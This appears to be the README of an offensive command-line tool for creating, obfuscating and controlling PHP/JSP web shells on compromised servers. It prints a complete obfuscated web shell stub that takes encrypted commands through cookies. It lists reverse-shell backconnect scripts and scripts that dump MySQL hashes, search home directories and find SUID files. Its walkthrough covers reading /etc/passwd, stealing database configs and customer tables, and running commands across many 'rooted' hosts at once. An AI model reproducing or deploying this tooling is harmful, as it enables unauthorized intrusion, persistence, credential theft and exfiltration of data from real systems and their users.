Command line interface to create and control minimalistic php/jsp shells.
- searchable and editable shell database
- alias
- comment
- geoip
- domain
- shell information
- pr
- tic
- creation time
- access time
- shell manager
- execute command or script on all shells
- execute command or script on a selection of shells
- overall stats
- total shells
- unique hosts
- utility commands
- cd
- edit
- upload
- download
- touch
- sed log cleaner
- tab autocompletion
- bash scripts
info - gather general information (runs on login)
php - list interesting php settings
av - detect common security software
kernel - kernel info
tech - detect useful software
dir - list contents of interesting dirs
global_suid - find all suid files
global_sgid - find all sgid files
global_write - find globally writeable files belonging to other users
users - list users
users_home - list contents of all $HOME dirs
users_file - list interesting files from all $HOME dirs
users_write - find writeable files in all $HOME dirs recursively
users_read - find readable files in all $HOME dirs recursively
process - list all processes
demo - reference for syntax quirks(!)
- backconnects
bash_dev.sh [ip] [port]
nc_e.sh [ip] [port]
nc_mknod.sh [ip] [port]
php.sh [ip] [port]
pl.sh [ip] [port]
pl_sys.sh [ip] [port]
py.sh [ip] [port]
rb.sh [ip] [port]
rb_popen.sh [ip] [port]
telnet_mknod.sh [ip] [port]
telnet_split.sh [ip] [stdin-port] [stdout-port]
- commands encrypted (badly!) and passed via cookies
- uploads optionally sent via post
- embeddable into other scripts
- error messages hidden
- shell.php stub executes php payloads via include
- shell.php stub delegates os cmd invokation to payloads
- b64.php cryptor obfuscates stub via psuedo-random variables and create_function
- php scripts
ls.php - list files
cat.php - cat file
drivers.php - list available database drivers
tree_table.php - show db hierarchy down to tables [driver] [username] [password]
tree_column.php - show db hierarchy down to colums [driver] [username] [password]
db.php - show databases [driver] [username] [password]
table.php - show tables [driver] [username] [password] [database]
column.php - show columns [driver] [username] [password] [database] [table]
pdo.php - query database [driver] [username] [password] [query]
loot_mysql.php - dump mysql hashes [username] [password]
Typical shell (shell.php stub and b64.php cryptor):
<?
$dYtKLa=null;
$XmzZZB='n5fgacrn5fgaean5fgate_fn5fgan5fgaunctin5fgaonn5fga';
$myC_YojOmE=str_replace('n5fga',$dYtKLa,$XmzZZB);
$bXxLybtZj='base25aWp25aWp625aWp4_25aWpd25aWp25aWpecod25aWpe25aWp';
$QRGzlAVFD=str_replace('25aWp',$dYtKLa,$bXxLybtZj);
$RMWnbJn_mqQ='CS8qd0lhWSovZnVuY3Rpb24gZW5jcnlwdCgka2V5LCRwYXNzLCRzdHIpeyRpc2VtcHR5PWVtcHR5KCRzdHIpfHxAZ3p1bmNvbXByZXNzKCRzdHIpPT09Jyc7JHN0cj0kcGFzcy4kc3RyOyRrZXlzaXplPXN0cmxlbigka2V5KTtmb3IoJGlpPTA7JGlpPCRrZXlzaXplOyRpaSsrKXskc3RyPWNocihtdF9yYW5kKCklMjU2KS4kc3RyO31mb3IoJGlpPTAsJHJlc3VsdD0nJywkY3VycmVudD0wOyRpaTxzdHJsZW4oJHN0cik7JGlpKyspeyRjdXJyZW50PW9yZCgkc3RyWyRpaV0pXkBvcmQoJGtleVskaWklJGtleXNpemVdKV4kY3VycmVudDskcmVzdWx0Lj1jaHIoJGN1cnJlbnQpO31yZXR1cm4oISRpc2VtcHR5KT8kcmVzdWx0OicnO31mdW5jdGlvbiBkZWNyeXB0KCRrZXksJHBhc3MsJHN0cil7JGtleXNpemU9c3RybGVuKCRrZXkpO2ZvcigkaWk9MCwkcmVzdWx0PScnLCRjdXJyZW50PTA7JGlpPHN0cmxlbigkc3RyKTskaWkrKyl7JHJlc3VsdC49Y2hyKG9yZCgkc3RyWyRpaV0pXkBvcmQoJGtleVskaWklJGtleXNpemVdKV4kY3VycmVudCk7JGN1cnJlbnQ9b3JkKCRzdHJbJGlpXSk7fXJldHVybighZW1wdHkoJHN0cikmJnN1YnN0cigkcmVzdWx0LCRrZXlzaXplLCRrZXlzaXplKT09PSRwYXNzKT9zdWJzdHIoJHJlc3VsdCwyKiRrZXlzaXplKTonJzt9ZnVuY3Rpb24gc2hlbGwoKSB7QG9iX3N0YXJ0KCk7JGtleT1wYWNrKCdIKicsJzlhNjQyYzRjM2VlMThhMThmY2JlN2E5NTEwMDRjOGVhJyk7JHBhc3M9cGFjaygnSConLCc2YzBkMGQ5MzAzZWU0MjQ0NDhmMTRmYWMxZGZmY2Y4YScpOyRtb2Q9QGd6dW5jb21wcmVzcyhkZWNyeXB0KCRrZXksJHBhc3MscGFjaygnSConLEBmaWxlX2dldF9jb250ZW50cygncGhwOi8vaW5wdXQnKSkpKTskY21kPUBnenVuY29tcHJlc3MoZGVjcnlwdCgka2V5LCRwYXNzLHBhY2soJ0gqJyxAJF9DT09LSUVbJ1BIUFNFU1NJRCddKSkpOyR0bXA9dGVtcG5hbShudWxsLG51bGwpO2ZpbGVfcHV0X2NvbnRlbnRzKCR0bXAsJzw/cGhwICcuJG1vZC4kY21kLicgPz4nKTt0cnl7aW5jbHVkZSgkdG1wKTt9Y2F0Y2goRXhjZXB0aW9uICRlKXt9JHI9dW5wYWNrKCdIKicsZW5jcnlwdCgka2V5LCRwYXNzLEBnemNvbXByZXNzKEBvYl9nZXRfY2xlYW4oKSw5KSkpO2VjaG8gJHJbMV07fXNoZWxsKCk7';
$jTOWXgk=$myC_YojOmE($dYtKLa,$QRGzlAVFD($RMWnbJn_mqQ));
$jTOWXgk();
?>
Development ongoing!
- commands converted to hex and passed via cookies
virtualenv env
. env/bin/activate
pip install -r requirements
./shell.py
and
help
Create a php shell:
./shell.py
load shellallthethings
use shell
options
set url http://domain.tld/shell.php
set alias haxhaxhax
set action PHPS3SS1D
set comment 1337
set outfile /tmp/shell.php
generate shell.php
Change the url for @haxhaxhax shell:
url @haxhaxhax http://domain.tld/images/1.php
List shells:
list
View info about @haxhaxhax:
info @haxhaxhax
Connect to shell:
connect @haxhaxhax
Execute commands:
ls
pwd
id
uname -a
cat /etc/passwd
Shell mode uses a special @
escape symbol for commands.
View help:
@help
Change dir to /tmp
:
@cd /tmp
Change dir to $home
:
@cd
Relative dirs are also supported:
@cd ../
Touch shell:
@touch
Download file:
@download cms/config/db.php /tmp/db.php
Run custom php code:
@eval { echo "haxhaxhax"; }
Run a php script (contrary to the cmd name, the script is actually uploaded to a tmp dir and included, not eval'ed):
@eval php.php
View available database drivers:
@eval drivers.php
View the db hierarchy:
@eval tree_table.php mysql toor E1!t3
Run a custom query:
@eval pdo.php mysql toor E1!t3 "select * from cms.customers;"
Run a bash script:
@script tech
Depending on the output choose a relevant backconnect:
@backconnect telnet_mknod.sh 192.168.0.1 4444
Connection issues can be mitagated by choosing a different port or a different backconnect.
Change transport method to post
for file uploads (>4kb):
@options
@set transport post
Upload file:
@upload /tmp/proxy.php 2.php
Binary files need to be encoded to base64:
base64 exploit > xpl.b64
And then decoded server side:
base64 -d xpl.b64 > exploit
Support for binary uploads is planned. If all else fails (ie no base64 on the server) then you can write a quick php script to make the upload.
Set transport method to default value:
@unset transport
Edit a file (will download file, launch your editor, check if changes were made and overwrite existing version):
@edit hacked.txt
Leave shell via ctrl+c.
Create a comment for @haxhaxhax:
comment @haxhaxhax "lulz rooted"
Search for shells by comment and domain:
search comment:"rooted" domain:*.tld
Execute script on all shells:
select domain:*|script kernel
Execute command on specific shells:
select comment:rooted|cmd uname -a;id
Run help
command for more information (on each module).